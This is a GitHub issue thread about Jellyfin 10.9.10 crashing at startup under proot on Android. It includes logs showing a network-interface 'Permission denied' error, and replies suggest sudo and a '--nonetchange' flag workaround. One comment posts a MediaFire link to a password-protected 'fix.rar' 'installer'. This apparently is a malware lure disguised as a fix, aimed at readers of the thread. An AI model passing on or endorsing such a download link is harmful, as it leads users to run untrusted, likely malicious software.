### ISSUE TITLE
Error obtaining interfaces

### ISSUE THREAD

**Issue by o81018o** [jellyfin/jellyfin#12520]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a configuration issue; Please visit our forum or chat rooms first to troubleshoot with volunteers, before creating a report. The links can be found [here](https://jellyfin.org/contact/).
- [X] This issue is **not** already reported on [GitHub](https://github.com/jellyfin/jellyfin/issues?q=is%3Aopen+is%3Aissue) _(I've searched it)_.
- [X] I'm using an up to date version of Jellyfin Server stable, unstable or master; We generally do not support previous older versions. If possible, please update to the latest version before opening an issue.
- [X] I agree to follow Jellyfin's [Code of Conduct](https://jellyfin.org/docs/general/community-standards.html#code-of-conduct).
- [X] This report addresses only a single issue; If you encounter multiple issues, kindly create separate reports for each one.

### Description of the bug

Jellyfin crashed on startup in proot.How should I fix this error?
![image](https://github.com/user-attachments/assets/02482bbb-41bd-46eb-96a6-a16d29a5efb1)

### Reproduction steps

Starting jellyfin in proot

### What is the current _bug_ behavior?

unbootable

### What is the expected _correct_ behavior?

startup

### Jellyfin Server version

10.9.9+

### Specify the build version

10.9.10

### Environment

```markdown
- OS:Android 14 ; Ubuntu 22.04.4 LTS
- Linux Kernel:
- Virtualization:proot
- Clients:
- Browser:
- FFmpeg Version:
- Playback Method:
- Hardware Acceleration:
- GPU Model:
- Plugins:
- Reverse Proxy:
- Base URL:
- Networking:
- Storage:
```

### Jellyfin logs

```shell
[22:33:32] [INF] [1] Main: Jellyfin version: 10.9.10
[22:33:32] [INF] [1] Main: Environment Variables: ["[DOTNET_GCHeapHardLimit, 1C0000000]", "[JELLYFIN_LOG_DIR, /home/android/.local/share/jellyfin/log]"]
[22:33:32] [INF] [1] Main: Arguments: ["/usr/lib/jellyfin/bin/jellyfin.dll"]
[22:33:32] [INF] [1] Main: Operating system: Ubuntu 22.04.4 LTS
[22:33:32] [INF] [1] Main: Architecture: Arm64
[22:33:32] [INF] [1] Main: 64-Bit Process: True
[22:33:32] [INF] [1] Main: User Interactive: True
[22:33:32] [INF] [1] Main: Processor count: 6
[22:33:32] [INF] [1] Main: Program data path: /home/android/.local/share/jellyfin
[22:33:32] [INF] [1] Main: Log directory path: /home/android/.local/share/jellyfin/log
[22:33:32] [INF] [1] Main: Config directory path: /home/android/.config/jellyfin
[22:33:32] [INF] [1] Main: Cache path: /home/android/.cache/jellyfin
[22:33:32] [INF] [1] Main: Web resources path: /usr/lib/jellyfin/bin/jellyfin-web
[22:33:32] [INF] [1] Main: Application directory: /usr/lib/jellyfin/bin/
[22:33:33] [INF] [1] Jellyfin.Server.Migrations.MigrationRunner: Marking following migrations as applied because this is a fresh install: ["CreateNetworkConfiguration", "MigrateMusicBrainzTimeout", "MigrateNetworkConfiguration"]
[22:33:33] [INF] [1] Emby.Server.Implementations.AppBase.BaseConfigurationManager: Setting cache path: /home/android/.cache/jellyfin
[22:33:33] [INF] [1] Emby.Server.Implementations.ApplicationHost: Loading assemblies
[22:33:33] [ERR] [1] Jellyfin.Networking.Manager.NetworkManager: Error obtaining interfaces.
System.Net.NetworkInformation.NetworkInformationException (13): Permission denied
   at System.Net.NetworkInformation.LinuxNetworkInterface.GetLinuxNetworkInterfaces()
   at Jellyfin.Networking.Manager.NetworkManager.InitializeInterfaces()
[22:33:33] [WRN] [1] Jellyfin.Networking.Manager.NetworkManager: No interface information available. Using loopback interface(s).
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Defined LAN subnets: ["127.0.0.1/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Defined LAN exclusions: []
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Used LAN subnets: ["127.0.0.1/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Filtered interface addresses: ["127.0.0.1"]
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Bind Addresses ["0.0.0.0"]
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Remote IP filter is Allowlist
[22:33:33] [INF] [1] Jellyfin.Networking.Manager.NetworkManager: Filtered subnets: []
[22:33:33] [FTL] [1] Main: Error while starting server
System.Net.NetworkInformation.NetworkInformationException (13): Permission denied
   at System.Net.NetworkInformation.NetworkChange.CreateSocket()
   at System.Net.NetworkInformation.NetworkChange.add_NetworkAddressChanged(NetworkAddressChangedEventHandler value)
   at Jellyfin.Networking.Manager.NetworkManager..ctor(IConfigurationManager configurationManager, IConfiguration startupConfig, ILogger`1 logger)
   at Emby.Server.Implementations.ApplicationHost.Init(IServiceCollection serviceCollection)
   at Jellyfin.Server.Program.<>c__DisplayClass8_0.<StartServer>b__0(IServiceCollection services)
   at Microsoft.Extensions.Hosting.HostBuilder.InitializeServiceProvider()
   at Microsoft.Extensions.Hosting.HostBuilder.Build()
   at Jellyfin.Server.Program.StartServer(IServerApplicationPaths appPaths, StartupOptions options, IConfiguration startupConfig)
[22:33:33] [INF] [1] Emby.Server.Implementations.ApplicationHost: Disposing CoreAppHost
[22:33:33] [INF] [1] Emby.Server.Implementations.ApplicationHost: Disposing PluginManager
```

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by felix920506** [comment]
it is a permissions issue. Just run JF as sudo, or switch to an operating system that isn't android.

**Comment by cvium** [comment]
We do not support Android. You are on your own here.

**Comment by buchstabenwurst** [comment]
It worked for me by using these arguments
`jellyfin --nonetchange --ffmpeg /usr/share/jellyfin-ffmpeg/ffmpeg`

**Comment by herofahad777** [comment]
> It worked for me by using these arguments `jellyfin --nonetchange --ffmpeg /usr/share/jellyfin-ffmpeg/ffmpeg`

Bro thank you so much. I wasted so much time trying to run the server on android termux and it finally did.
